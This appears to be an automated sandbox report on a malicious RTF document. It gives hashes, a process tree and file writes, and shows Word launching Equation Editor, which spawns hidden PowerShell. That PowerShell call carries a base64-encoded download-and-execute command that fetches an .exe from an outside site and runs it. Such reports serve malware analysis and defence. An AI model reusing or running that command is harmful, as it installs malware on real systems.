File name: | PDFT8559590555.doc |
Full analysis: | https://app.any.run/tasks/74ccad0d-25b5-47f7-9b72-ab1f13733205 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2019, 14:54:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | EF7F56CA630F0612534EAA3CF388CDBA |
SHA1: | 5420F1F4D693A96E5FB26C30428ED3661F12D171 |
SHA256: | 66800AFE021193F9309D890929652D06A05EA413E9E52AF6CD99EAED34BE4BAB |
SSDEEP: | 96:Vo8TNHFxeaqMesAwlAaNlHWDDkxxPWnv+G6SOuuYVsce28zik1lNxi2Srx0ElERV:VJRFcPMesdllHeIPk+rNeAJrCnlERUcd |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2420 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PDFT8559590555.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3040 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2356 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -noni -W Hidden -e aQBlAHgAIAAoACgAbgBlAHcALQBPAGIASgBlAGMAVAAgAFMAeQBzAFQAZQBtAC4AbgBlAFQALgBXAGUAQgBDAGwASQBlAE4AdAApAC4AZABPAHcAbgBMAG8AQQBEAGYASQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwBvAHIAbABkAGkAeABhAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AZABpAHIALwBqAG8ALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGIAYQBrAGQAcgBhAHcALgBlAHgAZQAiACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 3221225794 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA68B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2420 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F | |||
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\1.a | text | |
MD5:6EBD2C1A2AA5FBD9B94E2A4E25F86120 | SHA256:3C014B918F71B67E7A32A2A216F45E66DE972F71AD89CCB98D7DDD7F8EB842BD | |||
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$FT8559590555.doc | pgc | |
MD5:790F4F679F4AE2773D27F3BC1F028CF3 | SHA256:CFC4C7EEF3903AA2A16BB5CE166AC5CCE7D7526E64AE48A1451C720218C4A849 |